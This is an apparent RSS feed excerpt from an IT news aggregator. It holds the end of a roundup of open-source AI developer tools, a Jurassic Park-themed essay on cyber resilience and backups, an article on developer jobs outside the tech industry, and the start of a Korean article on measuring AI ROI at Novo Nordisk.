<p class="wp-block-paragraph">Many of the tools in this list help developers create code for other people. <a href="https://github.com/clawdbot/clawdbot?tab=readme-ov-file">Clawdbot</a> is the AI assistant for you, the person writing the code. It integrates with your desktop to control built-in tools like the camera and large applications like the browser. A multi-channel inbox accepts your commands through more than a dozen different communication channels including WhatsApp, Telegram, Slack, and Discord. A cron job adds timing. It’s the ultimate assistant for you, the ruler of your data. If AI exists to make our lives easier, why not start by organizing the applications on your desktop? License: MIT.</p>



<h2 class="wp-block-heading">Dify</h2>



<p class="wp-block-paragraph">For projects that require more than just one call to an LLM, <a href="https://github.com/langgenius/dify">Dify</a> could be the solution you’ve been looking for. Essentially a development environment for building complex agentic workflows, Dify stitches together LLMs, RAG databases, and other sources. It then monitors how they perform under different prompts and parameters and puts it all together in a handy dashboard, so you can iterate on the results. Developing agentic AI requires rapid experimentation, and Dify provides the environment for those experiments. License: Modified version of Apache 2.0 to exclude some commercial uses.</p>



<h2 class="wp-block-heading">Eigent</h2>



<p class="wp-block-paragraph">The best way to explore the power and limitations of an agentic workflow is to deploy it yourself on your own machine, where it can solve your own problems. Eigent delivers a workforce of specialized agents for handling tasks like writing code, searching the web, and creating documents. You just wave your hands and issue instructions, and Eigent’s LLMs do their best to follow through. Many startups brag about eating their own dogfood. Eigent puts that concept on a platter, making it easy for AI developers to experience directly the abilities and failings of the LLMs they’re building. License: Apache 2.0.</p>



<h2 class="wp-block-heading">Headroom</h2>



<p class="wp-block-paragraph">Programmers often think like packrats. If the data is good, why not pack in some more? This is a challenge for code that uses an LLM because these services charge by the token, and they also have a limited context window. <a href="https://github.com/chopratejas/headroom">Headroom</a> tackles this issue with agile compression algorithms that trim away the excess, especially the extra labels and punctuation found in common formats like JSON. A big part of designing working AI applications is cost engineering, and saving tokens means saving money. License: Apache 2.0.</p>



<h2 class="wp-block-heading">Hugging Face Transformers</h2>



<p class="wp-block-paragraph">When it comes to starting up a brand-new machine learning project, <a href="https://github.com/huggingface/transformers">Hugging Face Transformers</a> is one of the best foundations available. Transformers offers a standard format for defining how the model interacts with the world, which makes it easy to drop a new model into your working infrastructure for training or deployment. This means your model will interact nicely with all the already available tools and infrastructure, whether for text, vision, audio, video, or all of the above. Fitting into a standard paradigm makes it much easier to leverage your existing tools while focusing on the cutting edge of your research. License: Apache 2.0.</p>



<h2 class="wp-block-heading">LangChain</h2>



<p class="wp-block-paragraph">For agentic AI solutions that require endless iteration, <a href="https://github.com/langchain-ai/langchain">LangChain</a> is a way to organize the effort. It harnesses the work of a large collection of models and makes it easier for humans to inspect and curate the answers. When the task requires deeper thinking and planning, LangChain makes it easy to work with agents that can leverage multiple models to converge upon a solution. LangChain’s architecture includes a framework (LangGraph) for organizing easily customizable workflows with long-term memory, and a tool (LangSmith) for evaluating and improving performance. Its Deep Agents library provides teams of sub-agents, which organize problems into subsets then plan and work toward solutions. It is a proven, flexible test bed for agentic experimentation and production deployment. License: MIT.</p>



<h2 class="wp-block-heading">LlamaIndex</h2>



<p class="wp-block-paragraph">Many of the early applications for LLMs are sorting through large collections of semi-structured data and providing users with useful answers to their questions. One of the fastest ways to customize a standard LLM with private data is to use <a href="https://github.com/run-llama/llama_index">LlamaIndex</a> to ingest and index the data. This off-the-shelf tool provides data connectors that you can use to unpack and organize a large collection of documents, tables, and other data, often with just a few lines of code. The layers underneath can be tweaked or extended as the job requires, and LlamaIndex works with many of the data formats common in enterprises. License: MIT.</p>



<h2 class="wp-block-heading">Ollama</h2>



<p class="wp-block-paragraph">For anyone experimenting with LLMs on their laptop, <a href="https://github.com/ollama/ollama">Ollama</a> is one of the simplest ways to <a href="https://www.infoworld.com/article/2338922/5-easy-ways-to-run-an-llm-locally.html" data-type="link" data-id="https://www.infoworld.com/article/2338922/5-easy-ways-to-run-an-llm-locally.html">download one or more of them and get started</a>. Once it’s installed, your command line becomes a small version of the classic ChatGPT interface, but with the ability to pull a huge collection of models from a growing library of open source options. Just enter: <code>ollama run </code> and the model is ready to go. Some developers are using it as a back-end server for LLM results. The tool provides a stable, trustworthy interface to LLMs, something that once required quite a bit of engineering and fussing. The server simplifies all this work so you can tackle higher level chores with many of the <a href="https://ollama.com/library">most popular open source LLMs</a> at your fingertips. License: MIT.</p>



<h2 class="wp-block-heading">OpenWebUI</h2>



<p class="wp-block-paragraph">One of the fastest ways to put up a website with a chat interface and a dedicated RAG database is to spin up an instance of <a href="https://github.com/open-webui/open-webui">OpenWebUI</a>. This project knits together a feature-rich front end with an open back end, so that starting up a customizable chat interface only requires pulling a few <a href="https://www.infoworld.com/article/2257241/why-you-should-use-docker-and-oci-containers.html">Docker containers</a>. The project, though, is just a beginning, because it offers the opportunity to add plugins and extensions to enhance the data at each stage. Practically every part of the chain from prompt to answer can be tweaked, replaced, or improved. While some teams might be happy to set it up and be done, the advantages come from adding your own code. The project isn’t just open source itself, but a constellation of hundreds of little bits of contributed code and ancillary projects that can be very helpful. Being able to customize the pipeline and leverage the <a href="https://www.infoworld.com/article/4029634/what-is-model-context-protocol-how-mcp-bridges-ai-and-external-services.html">MCP protocol</a> supports the delivery of precision solutions. License: Modified BSD designed to restrict removing OpenWebUI branding without an enterprise license.</p>



<h2 class="wp-block-heading">Sim</h2>



<p class="wp-block-paragraph">The drag-and-drop canvas for <a href="https://github.com/simstudioai/sim">Sim</a> is meant to make it easier to experiment with <a href="https://www.infoworld.com/article/4086884/how-to-automate-the-testing-of-ai-agents.html">agentic workflows</a>. The tool handles the details of interacting with the various LLMs and vector databases; you just decide how to fit them together. Interfaces like Sim make the agentic experience accessible to everyone on your team, even those who don’t know how to write code. License: Apache 2.0.</p>



<h2 class="wp-block-heading">Sloth</h2>



<p class="wp-block-paragraph">One of the most straightforward ways to leverage the power of foundational LLMs is to start with an open source model and fine-tune it with your own data. <a href="https://github.com/unslothai/unsloth">Unsloth</a> does this, often faster than other solutions do. Most major open source models can be transformed with reinforcement learning. Unsloth is designed to work with most of the standard precisions and some of the largest context windows. The best answers won’t always come directly from RAG databases. Sometimes, adjusting the models is the best solution. License: Apache 2.0.</p>



<h2 class="wp-block-heading">vLLM</h2>



<p class="wp-block-paragraph">One of the best ways to turn an LLM into a useful service for the rest of your code is to start it up with <a href="https://github.com/vllm-project/vllm">vLLM</a>. The tool loads many of the available open source models from repositories like Hugging Face and then orchestrates the data flows so they keep running. That means batching the incoming prompts and managing the pipelines so the model will be a continual source of fast answers. It supports not just the CUDA architecture but also AMD CPUs and GPUs, Intel CPUs and GPUs, PowerPC CPUs, Arm CPUs, and TPUs. It’s one thing to experiment with lots of models on a laptop. It’s something else entirely to deploy the model in a production environment. vLLM handles many of the endless chores that deliver better performance. License: Apache-2.0.</p>



<p class="wp-block-paragraph"></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Jurassic Park, cybersecurity and the dangerous myth of control]]></title>
<description><![CDATA[Jurassic Park wasn’t really about dinosaurs.



It was about arrogant people building systems they believed were controllable.



“Life finds a way” is probably the most famous line from the entire franchise. Ian Malcolm’s warning that no matter how sophisticated the technology becomes, no matter...]]></description>
<link>https://tsecurity.de/de/3664863/it-security-nachrichten/jurassic-park-cybersecurity-and-the-dangerous-myth-of-control/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664863/it-security-nachrichten/jurassic-park-cybersecurity-and-the-dangerous-myth-of-control/</guid>
<pubDate>Mon, 13 Jul 2026 12:08:23 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Jurassic Park wasn’t really about dinosaurs.</p>



<p>It was about arrogant people building systems they believed were controllable.</p>



<p>“Life finds a way” is probably the most famous line from the entire franchise. Ian Malcolm’s warning that no matter how sophisticated the technology becomes, no matter how expensive the fences are, and no matter how confident the operators feel, nature eventually escapes containment.</p>



<figure class="wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio"><div class="wp-block-embed__wrapper youtube-video">

</div></figure>



<p>And in every movie, it does.</p>



<p>The dinosaurs always get out. The systems fail. Eventually, the humans lose control.</p>



<p>What makes Jurassic Park fascinating is that despite advanced monitoring, complex containment systems and sophisticated operational controls, the outcome never really changes. At its core, the story is about people mistaking visibility for control.</p>



<p>Cybersecurity has the same problem.</p>



<p>For years, security teams have operated under the assumption that with enough tooling, governance, process, maturity and spend, we can build environments that are effectively secure. Maybe not perfect, but secure enough that compromise becomes rare and manageable.</p>



<p>But attackers find a way.</p>



<p>Given enough time, skill or motivation, they eventually identify the weakness nobody considered. The overlooked privilege. The dependency nobody mapped. The misconfiguration hiding behind layers of dashboards, process, and compliance reporting.</p>



<p>We are already seeing this play out. Nation-state attacks are becoming increasingly sophisticated, while AI-driven exploit discovery is beginning to compress vulnerability research from weeks into minutes.</p>



<p>The raptors are learning faster now.</p>



<h2 class="wp-block-heading">Mistaking visibility for control</h2>



<p>That does not mean prevention no longer matters. The fences in Jurassic Park still slowed the dinosaurs down. They created friction. They reduced exposure. Modern security controls do the same thing.</p>



<p>But the failure in Jurassic Park was never simply that the fences broke.</p>



<p>It was that the entire system assumed the fences represented certainty.</p>



<p>Cybersecurity often makes the same mistake.</p>



<p>The industry has become incredibly good at demonstrating preparedness in controlled environments. Dashboards. Compliance reports. Tabletop exercises. RTO metrics. Recovery attestations.</p>



<p>Jurassic Park had dashboards too.</p>



<p>The problem is that <a href="https://www.csoonline.com/article/4157486/cisos-tackle-the-ai-visibility-gap.html">visibility is often mistaken for survivability</a>. Organizations can prove they monitored the environment, documented the process, and ran the exercise, while still having very little confidence that the business could continue operating during a genuine systemic failure.</p>



<p>Most organizations still operate with an implicit belief that compromise is exceptional rather than inevitable. Disaster recovery plans, business continuity workshops, and annual tabletop exercises are treated as evidence of resilience. In reality, many of them are carefully controlled simulations of a world that no longer exists.</p>



<p>Traditional disaster recovery was designed for an era where infrastructure changed slowly, applications were relatively static, and dependencies were limited enough that recovery assumptions could remain valid for months or even years.</p>



<p>That world is gone. AI killed it.</p>



<p>Environments now evolve constantly. Cloud infrastructure changes daily. AI-assisted development accelerates release cycles. Applications rely on sprawling third-party ecosystems. APIs connect systems in ways many organizations do not fully understand. Entire workloads appear and disappear dynamically.</p>



<p>The environment you tested last quarter may no longer exist today.</p>



<p>And yet many resilience programs still operate as if annual or quarterly testing provides meaningful confidence.</p>



<p>Most companies do not really test resilience.</p>



<p>They test optimism.</p>



<h2 class="wp-block-heading">The backup fallacy</h2>



<p>And nowhere is this overconfidence more obvious than <a href="https://www.csoonline.com/backup-recovery/">backups</a>.</p>



<p>Somewhere along the way, organizations confused “having backups” with “being resilient.” Those are not remotely the same thing.</p>



<p>A backup simply proves you stored a copy of something at a specific point in time. It does not prove you can survive.</p>



<p>Most recovery models were designed in the late 90s and early 2000s for relatively static systems and predictable infrastructure. The core philosophy has barely evolved since then, even as environments have become increasingly distributed, ephemeral, and interconnected.</p>



<p>Restoring data is not the same as restoring operations.</p>



<p>Restoring infrastructure is not the same as restoring business functionality. Modern application are complex and rely on ephemeral elements, third party components and applications as well as complex data flows not just data sets.</p>



<p>Very few organizations continuously validate whether they can recover full feature-function applications, maintain operational workflows, preserve data integrity, reconnect dependencies, restore permissions correctly, or continue operating under active attack conditions.</p>



<p>We built incredibly sophisticated telemetry for understanding how we die.</p>



<p>We built almost none for proving we can survive.</p>



<p>That gap is becoming impossible to ignore.</p>



<p>The recent rise of continuous resilience testing and recovery validation is not accidental. It reflects a growing realization that recovery assumptions themselves may no longer be trustworthy.</p>



<p>Static resilience models are struggling to survive dynamic infrastructure.</p>



<p>This is where resilience starts becoming an engineering problem rather than a compliance exercise.</p>



<h2 class="wp-block-heading">When restoration assumptions fail</h2>



<p>Because the real question is no longer, “How quickly can we restore the application?”</p>



<p>The real question is, “What happens if we cannot restore it?”</p>



<p>Jurassic Park repeatedly explored exactly this scenario. The real panic never started when the fences failed. It started when the operators realized they could not regain control quickly enough.</p>



<p>Businesses now face the same risk.</p>



<p>What happens if AWS experiences a prolonged outage? What happens if <a href="https://www.networkworld.com/article/4127142/azure-outage-disrupts-vms-and-identity-services-for-over-10-hours.html">Azure Identity Services fail</a> globally? What happens if Stripe, Salesforce, Slack, or Microsoft 365 disappear for days rather than hours?</p>



<p>Many organizations do not actually have business continuity strategies for those situations.</p>



<p>They have restoration assumptions.</p>



<p>Twenty years ago, most organizations directly owned large portions of their operational stack. Today, companies increasingly rent critical business capability from a relatively small number of providers.</p>



<p>Identity. Infrastructure. Communications. Payments. Collaboration. Customer operations.</p>



<p>The efficiency gains are enormous.</p>



<p>So is the concentration risk.</p>



<h2 class="wp-block-heading">Resilience as an engineering discipline</h2>



<p>Historically, business continuity planning assumed localized disruption. A building burned down. A regional data center failed. A storm impacted an office. The internet itself was not the dependency.</p>



<p>Today, entire businesses are built on tightly interconnected SaaS and cloud ecosystems where operational survivability depends on third parties remaining continuously available.</p>



<p>We optimized organizations for efficiency, automation, integration, and scale.</p>



<p>Not necessarily survivability.</p>



<p>That is why resilience needs to evolve beyond annual tabletop exercises and static recovery plans.</p>



<p>True resilience is not a binder sitting on a shelf. It is not a workshop performed once a year. It is not a recovery document written against an environment that changed six months ago.</p>



<p>It is a continuous understanding of the environment itself.</p>



<p>It requires live telemetry, operational visibility, dependency awareness, continuous validation, and the ability to adapt under changing conditions.</p>



<h2 class="wp-block-heading">Adapting to chaos</h2>



<p>The survivors in Jurassic Park only succeeded once they stopped pretending the environment was fully controllable and instead adapted to the reality in front of them.</p>



<p>Cybersecurity needs to make the same shift.</p>



<p>Attackers will keep adapting.</p>



<p>AI will accelerate faster than most governance models can handle.</p>



<p>Complexity will continue to outpace our assumptions about control.</p>



<p>The organizations that survive will not necessarily be the ones with the tallest fences. They will be the ones who understand their environments deeply enough to continue operating when control is lost.</p>



<p>The goal was never to eliminate chaos.</p>



<p>It was to survive long enough to adapt to it.</p>



<p>Because resilience is not about preventing chaos.</p>



<p>It is about operating through it.</p>



<p>Because eventually, one way or another, life finds a way.</p>



<p><strong>This article is published as part of the Foundry Expert Contributor Network.</strong><br><a href="https://www.csoonline.com/expert-contributor-network/"><strong>Want to join?</strong></a></p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[Where the software development jobs are now]]></title>
<description><![CDATA[While many technology companies have slowed hiring or even launched significant layoffs, that doesn’t mean job opportunities have dried up for software developers. In fact, skilled developers—particularly those with knowledge of AI—are in demand in other industries.



The key to success for deve...]]></description>
<link>https://tsecurity.de/de/3664782/ai-nachrichten/where-the-software-development-jobs-are-now/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664782/ai-nachrichten/where-the-software-development-jobs-are-now/</guid>
<pubDate>Mon, 13 Jul 2026 11:33:25 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>While many technology companies have slowed hiring or even launched <a href="https://www.trueup.io/layoffs" data-type="link" data-id="https://www.trueup.io/layoffs">significant layoffs</a>, that doesn’t mean job opportunities have dried up for software developers. In fact, skilled developers—particularly those with <a href="https://www.infoworld.com/article/4025073/9-ai-development-skills-tech-companies-want.html" data-type="link" data-id="https://www.infoworld.com/article/4025073/9-ai-development-skills-tech-companies-want.html">knowledge of AI</a>—are in demand in other industries.</p>



<p>The key to success for developers looking to snatch up these roles is to be well-prepared to meet the needs of potential employers in a variety of sectors.</p>



<p>“The demand for developers in non-tech sectors is real and growing, but the roles look different from what you’d find at a software company,” says <a href="https://drexel.edu/cci/about/directory/A/Awasthi-Pragati/" data-type="link" data-id="https://drexel.edu/cci/about/directory/A/Awasthi-Pragati/">Pragati Awasthi</a>, assistant teaching professor of AI and data science at Drexel University.</p>



<p>“Across all these sectors, the common thread is that software is no longer a support function; it is embedded in core operations,” Awasthi says. “The developer in these environments is often the person translating domain-specific business problems into technical solutions, which requires a different profile than a pure product engineer at a tech firm.”</p>



<h2 class="wp-block-heading">Opportunity knocks</h2>



<p>The tech industry has long been a mainstay as far as employing software developers. But as these businesses trim staffs in efforts to cut expenses, that has impacted the hiring landscape. Even as the tech sector scales back, however, companies in industries such as financial services/fintech, healthcare/healthtech, retail/ecommerce, and manufacturing are looking to acquire programming talent.</p>



<p>“The unifying factor is data complexity,” Awasthi says. “These industries generate large volumes of sensitive, regulated, or operationally critical data, and they need developers who can build and maintain systems that handle it responsibly.”</p>



<p>While recruiting firm Summit Search Group has placed developers in roles with technology companies, “it is just as common to recruit them for roles outside this niche,” says <a href="https://www.linkedin.com/in/matterhard/" data-type="link" data-id="https://www.linkedin.com/in/matterhard/">Matt Erhard</a>, managing partner at the company. “There are actually a fairly wide variety of roles available for developers in industries beyond tech,” Erhard says.</p>



<p>For example, in financial services Summit Search Group has seen significant hiring for back-end and data engineers who can build and maintain fraud detection systems, digital banking platforms, and regulatory tools, Erhard says. In healthcare, companies are hiring developers to build AI-driven diagnostics platforms and patient portals, or to work with systems that manage electronic health records, he says.</p>



<p>In manufacturing and industrial companies, developers are needed for systems integration and embedded software related to predictive maintenance, <a href="https://www.networkworld.com/article/963923/what-is-iot-the-internet-of-things-explained.html" data-type="link" data-id="https://www.networkworld.com/article/963923/what-is-iot-the-internet-of-things-explained.html">Internet of Things</a> (IoT) systems, and smart factories. And in retail and ecommerce, there’s strong demand for <a href="https://www.infoworld.com/article/2259033/full-stack-developer-what-it-is-and-how-you-can-become-one.html" data-type="link" data-id="https://www.infoworld.com/article/2259033/full-stack-developer-what-it-is-and-how-you-can-become-one.html">full-stack developers</a> and data developers who can handle logistics systems, omni-channel platforms, and personalization engines, Erhard says.</p>



<p>“One significant function where we’ve been placing developer talent lately is in developing business systems and internal applications,” Erhard says. These roles often have titles such as systems engineer or application developer, and professionals are hired to handle tasks such as customizing customer relationship management (CRM) or enterprise resource planning (ERP) platforms, building workflow automation tools or modernizing legacy systems, he says.</p>



<p>Other core functions for which Summit Search Group has placed a lot of developers include data, analytics, and AI-enablement. “That could be directly involved with <a href="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html">data engineering</a> or in building tools like reporting systems and <a href="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html" data-type="link" data-id="https://www.infoworld.com/article/2263668/data-wrangling-and-exploratory-data-analysis-explained.html">ETL [extract, transform, load]</a> pipelines,” Erhard says.</p>



<p>The firm also has handled searches for developers who can build and maintain customer-facing products for banking, healthcare, and retail companies, such as mobile apps or digital platforms customers can use to interact with companies.</p>



<p>Randstad Digital, a provider of global technology talent, sees demand for roles including web developers, system developers, and app developers. “These professionals would work on anything from customer-facing platforms to internal tools,” says <a href="https://www.linkedin.com/in/mpmorris36/" data-type="link" data-id="https://www.linkedin.com/in/mpmorris36/">Michael Morris</a>, global head of platform and talent at the company. “Non-tech companies are also often hiring roles like software architecture and <a href="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html" data-type="link" data-id="https://www.infoworld.com/article/2255028/what-is-devops-transforming-software-development.html">devops</a> to help scale existing technology. These involve being more ingrained in the business, like building a supply chain system for a retailer, rather than creating individual tech products like you would at a technology company.”</p>



<h2 class="wp-block-heading">Prep for success</h2>



<p>To increases the chances of success at landing developer jobs outside of the tech industry, development professionals would be wise to follow some good practices.</p>



<h3 class="wp-block-heading">Boost AI skills</h3>



<p>One best practice is to boost skills in using AI-powered tools and get familiar with all things AI.</p>



<p>“Get fluent with AI-assisted development and its limits,” Awasthi says. “This is not optional. Organizations across every sector expect developers to use AI coding tools productively. But the more durable skill is knowing when AI output is wrong, incomplete, or unsuitable for a regulated context. That critical evaluation capacity is what non-tech employers are increasingly trying to hire.”</p>



<p>AI does not necessarily replace the need for human developers so much as it changes the skills profile for those roles, Erhard says. “The biggest difference in recent years is that AI literacy is now a non-negotiable,” he says. “At minimum, developers today need to understand concepts like <a href="https://www.infoworld.com/article/4122440/what-is-prompt-engineering-the-art-of-ai-orchestration.html" data-type="link" data-id="https://www.infoworld.com/article/4122440/what-is-prompt-engineering-the-art-of-ai-orchestration.html">prompt engineering</a> and how to use AI tools to improve their efficiency.”</p>



<p>One thing many job candidates don’t expect is that the rise of AI has also increased the importance of high-level skills such as problem framing, system design, and cross-functional communication,” Erhard says. “Essentially, if something is related to development but too complex or nuanced for an AI to handle effectively, then the demand is high for human developers who have that expertise,” he says.</p>



<p>Candidates who land roles consistently have experience building AI-augmented workflows along with standard coding skills, Erhard says. “Employers increasingly expect to hire developers who can leverage AI, so demonstrating this experience on your résumé can be very beneficial,” he says.</p>



<h3 class="wp-block-heading">Gain domain knowledge</h3>



<p>Summit Search Group is seeing high demand for developers with deep domain knowledge in an organization’s specific industry. “So, for instance, if someone is both an experienced developer and has expertise in healthcare compliance, or financial regulations, then those candidates tend to be very sought after,” Erhard says.</p>



<p>Domain fluency is an underrated skill, Awasthi says. “A developer who understands healthcare compliance, financial regulation, or manufacturing process logic is significantly harder to replace than one who only writes clean code,” she says. “AI can generate boilerplate. It cannot navigate a HIPAA audit or explain a model’s output to a compliance officer.”</p>



<p>Development professionals should “pick an industry and learn it seriously; not just the technology stack but the regulatory environment, the business model, and the actual problems practitioners face,” Awasthi says. “A developer who has read about HIPAA, or spent time understanding credit risk, is immediately more valuable in those hiring contexts.”</p>



<p>It’s also vital to demonstrate real-world, practical application of skills, not just credentials. “The strongest candidates have projects in their portfolio that directly tie to and solve real business problems,” Erhard says.</p>



<h3 class="wp-block-heading">Acquire soft skills</h3>



<p>And then there are the soft skills that are becoming more of a differentiator than they were in the past. As AI handles more routine coding, human developers are expected to make more architectural decisions and collaborate across departments, Erhard says. “Strong communication and problem-solving skills are critical for many of the developer roles that we’re filling today,” he says.</p>



<p>While technical skills are still relevant for developers using and managing AI tools, “they also need to develop the skill of ‘deeper thinking’ and learn how to think one step ahead,” Morris says. “This includes skills like system design mastery—understanding the macro view and learning how <a href="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html" data-type="link" data-id="https://www.infoworld.com/article/2263327/what-are-microservices-your-next-software-architecture.html">microservices</a>, databases, and third-party APIs interact securely and efficiently.”</p>



<p>They also should become deeply fluent in the AI coding tools commonly used in their particular industry, with a strong understanding of how to prompt them for optimal output, Morris says. Product context awareness is also useful. “AI doesn’t know what the customer wants, but you do,” Morris says. “Understanding the business problem and the end-user experience is a requirement for being able to guide LLMs.”</p>



<h3 class="wp-block-heading">Master debugging and incident response</h3>



<p>Developers looking to break into non-tech sectors also should develop skills in debugging and incident response, Morris says. “Complex systems with multiple AI agents can, and will, fail, which means companies need humans to trace logic flaws to get the system back on track,” he says. “A mastery of root-cause analysis is a critical skill.”</p>



<p>“Security, compliance, and reliability are very important in non-tech industries like finance and healthcare,” says <a href="https://www.linkedin.com/in/rohit-agarwal/" data-type="link" data-id="https://www.linkedin.com/in/rohit-agarwal/">Rohit Agarwal</a>, co-founder of Zenius, a remote hiring company. “So employers want developers who also know regulatory environments well.”</p>



<h3 class="wp-block-heading">Network and keep learning</h3>



<p>To successfully pivot from jobs at tech companies, “continuous learning, upskilling, and building hybrid skills that combine technical and business knowledge are essential,” Morris says. “With the right preparation, tech professionals can adapt and continue to thrive in meaningful, dynamic careers.”</p>



<p>It’s also a good idea to join talent communities in fields of interest and “engage with other members in conversations that increase your knowledge through the collective intelligence of the community,” Morris says. “Take advantage of AI skilling opportunities relevant for your role, or better yet, where you want to go next. Experiment with the technology either on your own or through structured programs.” Ultimately, be curious and proactive, he says.</p>



<p>“I’d also recommend developers not to ignore referrals, direct outreach, and industry-specific communities during job search,” Agarwal says. “There are often a lot more opportunities available than the ones posted online.”</p>
</div></div></div></div>]]></content:encoded>
</item>
<item>
<title><![CDATA[AI ROI 측정의 어려움, 글로벌 IT 리더는 이렇게 풀었다]]></title>
<description><![CDATA[덴마크의 다국적 제약사 노보 노디스크(Novo Nordisk)는 특허 만료 전에 신약을 최대한 빨리 시장에 출시하는 데 큰 관심을 두고 있다. 노보 노디스크의 디지털 혁신 책임자(CDTO) 스테파니 보바(Stephanie Bova)는 “대형 블록버스터 신약의 경우 출시가 일주일만 늦어져도 손실 규모가 1,000만~1억 달러(약 149억~1,494억 원)에 이를 수 있다”라며 “특허 보호 기간 동안 제품을 판매할 수 있는 시간이 그만큼 줄어들기 때문”이라고 설명했다.



생성형 AI는 신약 개발 과정의 여러 단계를 획기적으로 ...]]></description>
<link>https://tsecurity.de/de/3664639/it-nachrichten/ai-roi-it/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3664639/it-nachrichten/ai-roi-it/</guid>
<pubDate>Mon, 13 Jul 2026 10:32:38 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
		<div class="grid grid--cols-10@md grid--cols-8@lg article-column">
					  <div class="col-12 col-10@md col-6@lg col-start-3@lg">
						<div class="article-column__content">
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>덴마크의 다국적 제약사 노보 노디스크(Novo Nordisk)는 특허 만료 전에 신약을 최대한 빨리 시장에 출시하는 데 큰 관심을 두고 있다. 노보 노디스크의 디지털 혁신 책임자(CDTO) 스테파니 보바(Stephanie Bova)는 “대형 블록버스터 신약의 경우 출시가 일주일만 늦어져도 손실 규모가 1,000만~1억 달러(약 149억~1,494억 원)에 이를 수 있다”라며 “특허 보호 기간 동안 제품을 판매할 수 있는 시간이 그만큼 줄어들기 때문”이라고 설명했다.</p>



<p>생성형 AI는 신약 개발 과정의 여러 단계를 획기적으로 단축할 가능성을 제시했다. 특히 노보 노디스크는 핵심 업무 프로세스마다 소요 시간을 꾸준히 추적·관리해 왔기 때문에 다른 많은 기업보다 유리한 출발점에 있었다. 생성형 AI를 일부 업무에 적용하면 생산성이 향상되고, 곧바로 재무 성과로 이어질 것으로 기대할 수도 있었다. 하지만 현실은 그렇게 단순하지 않았다. 신약 개발은 여러 부서에서 다양한 업무가 서로 다른 시점에 진행되는 복잡한 과정이기 때문이다.</p>



<p>보바는 “각 담당자는 자신이 맡은 분야의 전문가이지만, 다음 단계의 업무나 전체 프로세스가 어떻게 연결되는지까지는 잘 알지 못하는 경우가 많다”라며 “시스템 자체가 워낙 크고 복잡해 전체 성과를 한눈에 파악하기 어렵다”라고 설명했다.</p>



<p>프로세스 문서에 기록된 내용과 실제 업무 방식이 일치하지 않는 경우도 적지 않다. 같은 업무를 담당자마다 서로 다른 방식으로 수행하기도 하며, 일부 핵심 업무는 외부에서 거의 드러나지 않는다. 예를 들어 생산팀은 완전히 다른 조직에 속해 있어 신약이 미국 식품의약국(FDA) 제출을 앞두고 있다는 사실조차 인지하지 못할 수 있다. 이 경우 필요한 문서도 아직 준비되지 않은 상태일 수 있다.</p>



<p>보바는 “앞 단계에서는 아무리 빠르게 업무를 진행해도 결국 다른 팀의 준비가 끝날 때까지 기다려야 하는 상황이 발생한다”라고 말했다.</p>



<p>이는 기업이 AI 프로젝트의 성과를 측정하는 과정에서 마주하는 여러 어려움 가운데 하나이며, AI 관련 설문조사 결과가 서로 엇갈리는 이유이기도 하다.</p>



<p>개별 업무 단위에서 보면 노보 노디스크는 AI 도입을 통해 생산성이 향상됐고, 분명한 효과도 확인하고 있다. 하지만 시야를 넓혀 기업 전체의 실적을 기준으로 평가하면 상황은 훨씬 복잡해진다. 중요한 단계 하나라도 누락되면 신약 출시 기간은 단축되지 않는다. 또한 신약이 실제 환자에게 공급되기까지는 수년이 걸리기 때문에 AI 도입에 따른 재무적 효과 역시 상당한 시간이 지나야 나타난다. 그리고 이는 <a href="https://www.cio.com/article/4161724/%EC%B9%BC%EB%9F%BC-ai-roi%EC%9D%98-%EC%A7%84%EC%A7%9C-%EB%B3%80%EC%88%98%EB%8A%94-%EA%B8%B0%EC%88%A0-%EC%95%84%EB%8B%8C-%EC%A1%B0%EC%A7%81-%EC%84%A4%EA%B3%84.html" target="_blank">AI 투자 수익률(ROI)을 측정</a>하기 어렵게 만드는 문제의 시작에 불과하다.</p>



<h2 class="wp-block-heading">프로세스 측정의 중요성</h2>



<p>이 같은 프로세스의 사각지대를 해소하기 위해 노보 노디스크는 차세대 프로세스 마이닝 기술인 AI 기반 실시간 운영 디지털 트윈을 도입했다.</p>



<p>보바는 “프로세스 인텔리전스 기업 셀로니스(Celonis)와 협력해 프로세스 데이터를 기반으로 한 디지털 트윈을 구축했다”라며 “임상 분야에 이 기술을 적용한 것은 업계 최초였다”라고 설명했다. 이 도구는 기업 시스템에서 데이터를 수집해 직원들이 실제로 어떤 업무를 수행하는지 추적한다. 일부 직원의 기억에 의존하는 설문조사 방식과 달리 실제 업무 흐름을 객관적으로 파악할 수 있다는 것이 특징이다.</p>



<p>첫 번째 적용 대상은 7단계로 구성된 비교적 단순한 프로세스였다. 하지만 디지털 트윈을 구축한 결과, 실제로는 담당자에 따라 5단계로 진행되기도 하고 9단계까지 늘어나기도 한다는 사실이 드러났다.</p>



<p>보바는 “동일한 업무 전문가 10명을 한자리에 모아도 프로세스에 대한 해석은 제각각이며, 시간이 지나면서 업무 방식도 조금씩 달라진다”라고 말했다.</p>



